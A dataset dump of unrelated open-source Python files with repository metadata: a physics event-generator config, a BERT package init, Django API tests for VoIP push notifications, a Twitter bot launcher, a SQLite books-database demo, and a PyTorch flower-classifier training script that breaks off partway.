blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33f935bea229e032c0010156da4138460aa8b87b | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/Guns/SinglePiPt100Eta1p6_2p8_cfi.py | 7114b9ba046ef43a0d856832cc7b42d9623ef41d | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 618 | py | import FWCore.ParameterSet.Config as cms
generator = cms.EDProducer("FlatRandomPtGunProducer",
PGunParameters = cms.PSet(
MaxPt = cms.double(100.01),
MinPt = cms.double(99.99),
PartID = cms.vint32(211),
MaxEta = cms.double(2.8),
MaxPhi = cms.double(3.14159265359),
MinEta = cms.double(1.6),
MinPhi = cms.double(-3.14159265359) ## in radians
),
Verbosity = cms.untracked.int32(0), ## set to 1 (or greater) for printouts
psethack = cms.string('single pi pt 100'),
AddAntiParticle = cms.bool(True),
firstRun = cms.untracked.uint32(1)
)
| [
"andreas.psallidas@cern.ch"
] | andreas.psallidas@cern.ch |
43a001b61a2b88c85128419e2299cf68b0abffef | ad8cc76e8b35aae9756a406859ce637c31c940ac | /bertQA/pytorch_pretrained_bert/__init__.py | 1efc7bb8727c93cc48cbd2111a8835044e61caa7 | [] | no_license | YingZiqiang/CMRC2019-Solution | 6882c1fcee899baf8082b3c7018779fe9d70470a | 713c1a08a2ee595704b921db337e8ccac6cdc9b9 | refs/heads/master | 2023-01-09T20:22:10.284365 | 2019-07-02T14:10:51 | 2019-07-02T14:10:51 | 190,866,541 | 3 | 1 | null | 2022-12-21T14:23:30 | 2019-06-08T08:57:21 | Python | UTF-8 | Python | false | false | 522 | py | __version__ = "0.4.0"
from .tokenization import BertTokenizer, BasicTokenizer, WordpieceTokenizer
from .modeling import (BertConfig, BertModel, BertForPreTraining,
BertForMaskedLM, BertForNextSentencePrediction,
BertForSequenceClassification, BertForMultipleChoice,
BertForTokenClassification, BertForQuestionAnswering)
from .modelingdec import BertForCMRC2019Dec
from .optimization import BertAdam
from .file_utils import PYTORCH_PRETRAINED_BERT_CACHE
| [
"88629850@qq.com"
] | 88629850@qq.com |
a3e2298a9219c9c76fdbe33e87e08bdbcf24fc91 | eddb3c0161a12e612d3070c257610e859e409a8d | /com.leon.ml/logistic/__init__.py | e392d92f72c4440d0906f22ea187026eb4b89f90 | [] | no_license | bazingagain/MLInAction | 942da99cb09200044486a71d7ecbb7285c45af22 | 973df5f3dbc77744ccf4f1b237def4b8ae48f754 | refs/heads/master | 2021-08-31T04:44:05.313045 | 2017-12-20T12:01:35 | 2017-12-20T12:01:35 | 109,850,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | # Created by leon at 03/12/2017 | [
"1152204424@qq.com"
] | 1152204424@qq.com |
ec9840061a03bfd150d1205cc0924c99f889f02d | 7d4f49bf18b548e40ce0493c9fd4c7c8515ed011 | /api/tests/test_views.py | 66ae3b57711c0eb870e07513bd17b65903538a82 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mobdim/vialer-middleware | 0730ca5d9edf206141abef46cb7d705c04a39906 | f186b05c05f50a00a61c1f9c8ef8b29591c45eee | refs/heads/master | 2021-08-22T06:00:46.502794 | 2017-06-06T07:43:50 | 2017-06-06T07:43:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,566 | py | from datetime import datetime, timedelta
import time
from unittest import mock
from django.conf import settings
from django.core.cache import cache
from django.test import TestCase, TransactionTestCase
from rest_framework.test import APIClient
from app.models import App, Device, ResponseLog
from .utils import mocked_send_apns_message, mocked_send_fcm_message, ThreadWithReturn
class RegisterDeviceTest(TestCase):
def setUp(self):
super(RegisterDeviceTest, self).setUp()
self.client = APIClient()
self.ios_app, created = App.objects.get_or_create(platform='apns', app_id='com.voipgrid.vialer')
self.android_app, created = App.objects.get_or_create(platform='android', app_id='com.voipgrid.vialer')
self.data = {
'name': 'test device',
'token': 'a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
'sip_user_id': '123456789',
'os_version': '8.3',
'client_version': '1.0',
'app': 'com.voipgrid.vialer',
}
self.ios_url = '/api/apns-device/'
self.android_url = '/api/android-device/'
@mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
def test_register_apns_device(self, *mocks):
"""
This tests more than its name suggests. It also tests, unregister, token update, sip_id update etc!
"""
# New APNS registration.
response = self.client.post(self.ios_url, self.data)
self.assertEqual(response.status_code, 201, msg='Wrong status code for create')
device = Device.objects.get(sip_user_id=self.data['sip_user_id'])
# Register again.
response = self.client.post(self.ios_url, self.data)
self.assertEqual(response.status_code, 200, msg='Wrong status code for update')
# Register other token
self.data['token'] = 'b652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6'
response = self.client.post(self.ios_url, self.data)
self.assertEqual(response.status_code, 200, msg='Wrong status code for update')
# Check if change is stored.
device = Device.objects.get(sip_user_id=self.data['sip_user_id'])
self.assertEqual(device.name, self.data['name'], msg='Wrong value for name')
self.assertEqual(device.token, self.data['token'], msg='Wrong value for token')
self.assertEqual(device.os_version, self.data['os_version'], msg='Wrong value for os_version')
self.assertEqual(device.client_version, self.data['client_version'], msg='Wrong value for client_version')
# Check if linked app is correct one!
self.assertEqual(device.app, self.ios_app, 'Wrong linked app!')
self.assertEqual(device.app.platform, 'apns', 'Wrong value for platform!')
self.assertEqual(device.app.app_id, 'com.voipgrid.vialer', 'Wrong value for app_id')
# Register same token for other sip id (Which means update).
self.data['sip_user_id'] = '234567890'
response = self.client.post(self.ios_url, self.data)
self.assertEqual(response.status_code, 201, msg='Must be a 200 because of updated')
# Do unregister for changed token.
response = self.client.delete(self.ios_url, {
'token': 'b652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
'sip_user_id': '234567890',
'app': self.data['app'],
})
self.assertEqual(response.status_code, 200, msg='Wrong status code for unregister, expected 200')
# Check if old token is gone.
response = self.client.delete(self.ios_url, {
'token': 'b652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
'sip_user_id': '234567890',
'app': self.data['app'],
})
self.assertEqual(response.status_code, 404, msg='Wrong status code for unregister, expected 404')
@mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
def test_register_android_device(self, *mocks):
"""
Test if android registration succeeds
"""
response = self.client.post(self.android_url, self.data)
self.assertEqual(response.status_code, 201, 'Update sip_id to android account failed!')
device = Device.objects.get(sip_user_id=self.data['sip_user_id'])
self.assertEqual(device.name, self.data['name'], msg='Wrong value for name')
self.assertEqual(device.token, self.data['token'], msg='Wrong value for token')
self.assertEqual(device.os_version, self.data['os_version'], msg='Wrong value for os_version')
self.assertEqual(device.client_version, self.data['client_version'], msg='Wrong value for client_version')
# Check if linked app is correct one!
self.assertEqual(device.app, self.android_app, 'Wrong linked app!')
self.assertEqual(device.app.platform, 'android', 'Wrong value for platform!')
self.assertNotEqual(device.app.platform, 'apns', 'Indeed wrong value for platform!')
self.assertEqual(device.app.app_id, 'com.voipgrid.vialer', 'Wrong value for app_id')
# Do unregister for changed token.
response = self.client.delete(self.android_url, {
'token': self.data['token'],
'sip_user_id': self.data['sip_user_id'],
'app': self.data['app'],
})
self.assertEqual(response.status_code, 200, msg='Wrong status code for unregister, expected 200')
def test_register_unexisting_app(self):
"""
Test registration of an unexisting app
"""
self.data['app'] = 'com.myapp.doesnotexists'
response = self.client.post(self.ios_url, self.data)
self.assertEqual(response.status_code, 404, msg='Wrong status code for create')
response = self.client.post(self.android_url, self.data)
self.assertEqual(response.status_code, 404, msg='Wrong status code for create')
@mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
@mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
def test_switch_sip_ios_to_android(self, *mocks):
"""
Test the switch a sip_user_id from an ios to an android client.
"""
response = self.client.post(self.ios_url, self.data)
self.assertEqual(response.status_code, 201, msg='Wrong status code for create')
self.data['token'] = 'iosaee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6'
response = self.client.post(self.android_url, self.data)
self.assertEqual(response.status_code, 200, msg='Wrong status code for update!')
self.assertTrue(Device.objects.count() == 1, 'There should be only one updated device!')
@mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
@mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
def test_switch_sip_android_to_ios(self, *mocks):
"""
Test the switch a sip_user_id from an android to an ios client.
"""
response = self.client.post(self.android_url, self.data)
self.assertEqual(response.status_code, 201, msg='Wrong status code for update!')
self.data['token'] = 'android4bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6'
response = self.client.post(self.ios_url, self.data)
self.assertEqual(response.status_code, 200, msg='Wrong status code for create')
self.assertTrue(Device.objects.count() == 1, 'There should be only one updated device!')
class IOSIncomingCallTest(TransactionTestCase):
def setUp(self):
super(IOSIncomingCallTest, self).setUp()
self.client = APIClient()
# URL's.
self.response_url = '/api/call-response/'
self.incoming_url = '/api/incoming-call/'
self.ios_app, created = App.objects.get_or_create(platform='apns', app_id='com.voipgrid.vialer')
@mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
def test_available_incoming_call(self, *mocks):
"""
Test a call when the device is available (default).
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
# Call non existing device
response = self.client.post(self.incoming_url, call_data)
self.assertEqual(response.content, b'status=NAK')
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.ios_app
)
call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
# Now the device exists, call it again in seperate thread.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
# Simulate some wait-time before device responds.
time.sleep(1.5)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': time.time(),
}
# Send the fake response from device.
self.client.post(self.response_url, app_data)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call got accepted.
self.assertEqual(response.content, b'status=ACK')
self.assertEqual(cache.get('attempts'), 2)
@mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
def test_not_available_incoming_call(self, *mocks):
"""
Test a call when device is not available.
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.ios_app
)
call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
# Now the device exists, call it again in seperate thread.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
# Simulate some wait-time before device responds.
time.sleep(1.5)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': time.time(),
'available': 'False',
}
# Send the fake response from device.
self.client.post(self.response_url, app_data)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call got accepted.
self.assertEqual(response.content, b'status=NAK')
self.assertEqual(cache.get('attempts'), 2)
@mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
def test_too_late_incoming_call(self, *mocks):
"""
Test a call when device is too late.
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.ios_app
)
call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
# Start thread to simulate asteriks waiting for response.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
too_late_time = time.time()
# Wait the wait time + 1 second.
too_late_wait_time = (settings.APP_PUSH_ROUNDTRIP_WAIT + 1000) / 1000
# Simulate some too long wait time for device to respond.
time.sleep(too_late_wait_time)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': too_late_time,
}
# Send the fake response from device which should be too late.
too_late_response = self.client.post(self.response_url, app_data)
self.assertEqual(too_late_response.status_code, 404)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call resulted in a NAK.
self.assertEqual(response.content, b'status=NAK')
self.assertEqual(cache.get('attempts'), 3)
@mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
def test_log_to_db(self, *mocks):
"""
Test a call when device is too late.
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.ios_app
)
call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
start_time = time.time()
# Start thread to simulate asteriks waiting for response.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
# Simulate some wait time for device to respond.
time.sleep(1)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': start_time,
}
# Send the fake response from device which should be too late.
response = self.client.post(self.response_url, app_data)
self.assertEqual(response.status_code, 202)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call resulted in a ACK.
self.assertEqual(response.content, b'status=ACK')
# Wait 1 second to be sure the thread that writes to log is finished.
time.sleep(1)
# Get the amount of response log entries.
log_count = ResponseLog.objects.filter(platform=self.ios_app.platform).count()
# Check if there is a log entry.
self.assertGreater(log_count, 0)
class AndroidIncomingCallTest(TransactionTestCase):
def setUp(self):
super(AndroidIncomingCallTest, self).setUp()
self.client = APIClient()
# URL's.
self.response_url = '/api/call-response/'
self.incoming_url = '/api/incoming-call/'
self.android_app, created = App.objects.get_or_create(platform='android', app_id='com.voipgrid.vialer')
@mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
def test_available_incoming_call(self, *mocks):
"""
Test a call when the device is available (default).
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
# Call non existing device.
response = self.client.post(self.incoming_url, call_data)
self.assertEqual(response.content, b'status=NAK')
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.android_app,
)
call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
# Now the device exists, call it again in seperate thread.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
# Simulate some wait-time before device responds.
time.sleep(1.5)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': time.time(),
}
# Send the fake response from device.
self.client.post(self.response_url, app_data)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call got accepted.
self.assertEqual(response.content, b'status=ACK')
self.assertEqual(cache.get('attempts'), 2)
@mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
def test_not_available_incoming_call(self, *mocks):
"""
Test a call when device is not available.
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.android_app,
)
call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
# Now the device exists, call it again in seperate thread.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
# Simulate some wait-time before device responds.
time.sleep(1.5)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': time.time(),
'available': False,
}
# Send the fake response from device.
self.client.post(self.response_url, app_data)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call got accepted.
self.assertEqual(response.content, b'status=NAK')
self.assertEqual(cache.get('attempts'), 2)
@mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
def test_too_late_incoming_call(self, *mocks):
"""
Test a call when device is too late.
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.android_app,
)
call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
# Start thread to simulate asteriks waiting for response.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
too_late_time = time.time()
# Wait the wait time + 1 second.
too_late_wait_time = (settings.APP_PUSH_ROUNDTRIP_WAIT + 1000) / 1000
# Simulate some too long wait time for device to respond.
time.sleep(too_late_wait_time)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': too_late_time,
}
# Send the fake response from device which should be too late.
too_late_response = self.client.post(self.response_url, app_data)
self.assertEqual(too_late_response.status_code, 404)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call resulted in a NAK.
self.assertEqual(response.content, b'status=NAK')
self.assertEqual(cache.get('attempts'), 3)
@mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
def test_log_to_db(self, *mocks):
"""
Test a call when device is too late.
"""
call_data = {
'sip_user_id': '123456789',
'caller_id': 'Test name',
'phonenumber': '0123456789',
}
two_weeks_ago = datetime.now() - timedelta(days=14)
Device.objects.create(
name='test device',
token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
sip_user_id='123456789',
os_version='8.3',
client_version='1.0',
last_seen=two_weeks_ago,
app=self.android_app,
)
call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
start_time = time.time()
# Start thread to simulate asteriks waiting for response.
thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
thread.start()
# Simulate some wait time for device to respond.
time.sleep(1)
app_data = {
'unique_key': call_data['call_id'],
'message_start_time': start_time,
}
# Send the fake response from device which should be too late.
response = self.client.post(self.response_url, app_data)
self.assertEqual(response.status_code, 202)
# Wait for the incoming-call to finish.
response = thread.join()
# Check if incoming-call resulted in a ACK.
self.assertEqual(response.content, b'status=ACK')
# Wait 1 second to be sure the thread that writes to log is finished.
time.sleep(1)
# Get the amount of response log entries.
log_count = ResponseLog.objects.filter(platform=self.android_app.platform).count()
# Check if there is a log entry.
self.assertGreater(log_count, 0)
| [
"m.vellinga@me.com"
] | m.vellinga@me.com |
efdf39b9dfab765028f936129c07e0ca29c3fd1e | 1c6b25033e27f52ef2723dd743da4cca8807ea7c | /wows_news_twitter.py | df29d80e220c7bc6e3216bd060c4806a91975986 | [
"MIT"
] | permissive | hiraki-uk/wows-news-twitter | 6111bd01616f25481ec379b035a57a03b1eb1a13 | eaca13ed20021b2c79112315d9b10974a6615cbf | refs/heads/master | 2022-12-09T13:16:49.018269 | 2020-02-11T10:49:36 | 2020-02-11T10:49:36 | 213,749,446 | 0 | 0 | MIT | 2022-12-08T03:35:33 | 2019-10-08T20:40:27 | Python | UTF-8 | Python | false | false | 1,002 | py | """
Main python file.
English description is for developers, where Japanese ones will be desplayed to users.
"""
import asyncio
import os
import sys
from pathlib import Path
from dotenv import load_dotenv
from logger import Logger
from tweet_news import Tweet_news
def twitter_setup():
# path to environment variables
env_path = '.env'
load_dotenv(dotenv_path=env_path)
# get data from .env
key = os.getenv('TWITTER_KEY')
key_secret = os.getenv('TWITTER_KEY_SECRET')
token = os.getenv('TWITTER_TOKEN')
token_secret = os.getenv('TWITTER_TOKEN_SECRET')
db_path = os.getenv('DB_PATH')
return key, key_secret, token, token_secret, db_path
if __name__ == '__main__':
key, key_s, token, token_s, db_path = twitter_setup()
twitter_news = Tweet_news(key, key_s, token, token_s, db_path)
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(
twitter_news.start()
)
except KeyboardInterrupt:
# loop.run_until_complete(bot.logout())
pass
finally:
loop.close()
| [
"hiraki.uk@gmail.com"
] | hiraki.uk@gmail.com |
91a26161b835aabeba908bf171f25602b115839c | 2e58532464f58b27de68297b0348f0c460448474 | /Assignment_15/cpintor_HW_15/ch17/main.py | 476210dd8cc42923e43bd18f6ed960031540ca99 | [] | no_license | RidaATariq/ITMD_413 | 969a2ebe48746b3269493027daef666bd7a26997 | ee1676419e2a09ce4d52cfca3c3e02f00b24f74f | refs/heads/main | 2023-04-20T19:15:12.864852 | 2021-05-09T18:41:46 | 2021-05-09T18:41:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,346 | py | """
This program demonstrates how to use SQLite3 with Python and how
to work with databases.
Name: Cristian Pintor
"""
import sqlite3
connection = sqlite3.connect('books.db')
import pandas as pd
pd.options.display.max_columns = 10
pd.read_sql('SELECT * FROM authors', connection, index_col=['id'])
pd.read_sql('SELECT * FROM titles', connection)
df = pd.read_sql('SELECT * FROM author_ISBN', connection)
df.head()
pd.read_sql('SELECT first,last FROM authors',
connection)
pd.read_sql("""SELECT title, edition, copyright
FROM titles
WHERE copyright > '2016'""", connection)
pd.read_sql("""SELECT id, first, last
FROM authors
WHERE last LIKE 'D%'""",
connection, index_col=['id'])
pd.read_sql("""SELECT id, first, last
FROM authors
WHERE first LIKE '_b%'""",
connection, index_col=['id'])
pd.read_sql('SELECT title FROM titles ORDER BY title ASC',
connection)
pd.read_sql("""SELECT id, first, last
FROM authors
ORDER BY last, first""",
connection, index_col=['id'])
pd.read_sql("""SELECT id, first, last
FROM authors
ORDER BY last DESC, first ASC""",
connection, index_col=['id'])
pd.read_sql("""SELECT isbn, title, edition, copyright
FROM titles
WHERE title LIKE '%How to Program'
ORDER BY title""", connection)
pd.read_sql("""SELECT first, last, isbn
FROM authors
INNER JOIN author_ISBN
ON authors.id = author_ISBN.id
ORDER BY last, first""", connection).head()
cursor = connection.cursor()
cursor = cursor.execute("""INSERT INTO authors (first, last)
VALUES ('Sue', 'Red')""")
pd.read_sql('SELECT id, first, last FROM authors',
connection, index_col=['id'])
cursor = cursor.execute("""UPDATE authors SET last='Black'
WHERE last='Red' AND first='Sue'""")
pd.read_sql('SELECT id, first, last FROM authors',
connection, index_col=['id'])
cursor = cursor.execute('DELETE FROM authors WHERE id=6')
pd.read_sql('SELECT id, first, last FROM authors',
connection, index_col=['id']) | [
"cpintor@hawk.iit.edu"
] | cpintor@hawk.iit.edu |
65fe900208e9fc51b37c1eafd31420a6a244b913 | fa2bcfe157fec22e0771059eac4205c1ecc67dfd | /train.py | c7ae2a3ea5cb1612b4064da0a582b93bb0c35957 | [] | no_license | A-Nuru/Udacity | a539de107e82c3bce4ab55cc09e131774ccd093a | 4bc7184196f01ea190c754237198da3bb371bd6c | refs/heads/master | 2020-04-21T10:23:02.425695 | 2019-04-17T07:39:26 | 2019-04-17T07:39:26 | 169,484,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,404 | py |
# Imports here
#%matplotlib inline
#%config InlineBackend.figure_format = 'retina'
import matplotlib.pyplot as plt
import numpy as np
import torch
from torch import nn
from torchvision import datasets, transforms, models
from torch import optim
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
import argparse
import seaborn as sns
import json
from collections import OrderedDict
def process_data(data_dir):
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# TODO: Define your transforms for the training, validation, and testing sets
data_transforms_train = transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomRotation(30),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
data_transforms_valid = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
data_transforms_test = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
# TODO: Load the datasets with ImageFolder
image_datasets_train = datasets.ImageFolder(data_dir + '/train', transform = data_transforms_train)
image_datasets_valid = datasets.ImageFolder(data_dir + '/valid', transform = data_transforms_valid)
image_datasets_test = datasets.ImageFolder(data_dir + '/test', transform = data_transforms_test)
# TODO: Using the image datasets and the trainforms, define the dataloaders
dataloaders_train = torch.utils.data.DataLoader(image_datasets_train , batch_size = 32, shuffle = True)
dataloaders_valid = torch.utils.data.DataLoader(image_datasets_valid , batch_size = 32, shuffle = True)
dataloaders_test = torch.utils.data.DataLoader(image_datasets_test , batch_size = 32, shuffle = True)
return dataloaders_train, dataloaders_valid, dataloaders_test, image_datasets_train, image_datasets_valid, image_datasets_test
# Load pretrained_network
def pretrained_model(arch):
if arch == "vgg16":
model = models.vgg16(pretrained=True)
print('Using vgg16')
elif arch == "resnet18":
model = models.squeezenet1_0(pretrained=True)
print('Using squeezenet1_0')
elif arch == "alexnet":
model = models.alexnet(pretrained=True)
print("Using alexnet")
return model
def classifier(model, hidden_units):
if hidden_units == None:
hidden_units = 512
input = model.classifier[0].in_features
classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(input, hidden_units)),
('relu', nn.ReLU()),
('drop', nn.Dropout(p = 0.2)),
('fc2', nn.Linear(hidden_units, 102)),
('output', nn.LogSoftmax(dim = 1))]))
model.classifier = classifier
return classifier, model.classifier
'''def device():
use_gpu = torch.cuda.is_available()
if args.gpu:
if use_gpu:
model = model.cuda()
print ("Using GPU: "+ str(use_gpu))
else:
print("Using CPU because GPU is not available")'''
# Training Network(model) with the training dataset
#for i in keep_awake(range(1)):
def train_model(epochs, dataloaders_train, dataloaders_valid, device, model, optimizer, criterion):
epochs = 10
running_loss = 0
print_every = 100
steps = 0
train_losses, valid_losses = [], []
for epoch in range(epochs):
for images, labels in dataloaders_train:
steps += 1
model.to(device)
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad()
logps = model.forward(images)
train_loss = criterion(logps, labels)
train_loss.backward()
optimizer.step()
running_loss += train_loss.item()
if steps % print_every == 0:
model.eval()
valid_loss = 0
accuracy = 0
# turning the gradient off for the validation stage for faster computation
with torch.no_grad():
for images, labels in dataloaders_valid:
images, labels = images.to(device), labels.to(device)
logps = model(images)
loss = criterion(logps, labels)
valid_loss += loss.item()
ps = torch.exp(logps)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
train_losses.append(running_loss/len(dataloaders_train))
valid_losses.append(valid_loss/len(dataloaders_valid))
print(f"Epoch {epoch+1}/{epochs}.. "
f"Train loss: {running_loss/len(dataloaders_train):.3f}.. "
f"Valid loss: {valid_loss/len(dataloaders_valid):.3f}.. "
f"Accuracy: {accuracy/len(dataloaders_valid):.3f}")
running_loss = 0
model.train()
return model
# testing network
def test_network(model, dataloaders_test, device, criterion):
test_loss = 0
accuracy = 0
model.eval()
with torch.no_grad():
for images, labels in dataloaders_test:
images, labels = images.to(device), labels.to(device)
logps = model(images)
test_loss += criterion(logps, labels)
ps = torch.exp(logps)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor))
print(f"Test accuracy: {accuracy/len(dataloaders_test):.3f}")
# saving model checkpoint
def save_checkpoint(model, image_datasets_train, checkpoint, arch, epochs):
# mapping classes to indices
model.class_to_idx = image_datasets_train.class_to_idx
checkpoint = {'arch': arch,
'classifier': model.classifier,
'state_dict': model.state_dict(),
'class_to_idx' : model.class_to_idx,
'epochs' : epochs,
'optimizer_state_dict' : optimizer.state_dict(),
'lr' : 0.001}
return torch.save(checkpoint, args.checkpoint)
if __name__ == '__main__':
paser = argparse.ArgumentParser(description='training image classifier for flowers')
paser.add_argument('data_dir', type=str, default='flowers', help='dataset directory')
paser.add_argument('--gpu', type=bool, default='True', help='True: gpu, False: cpu')
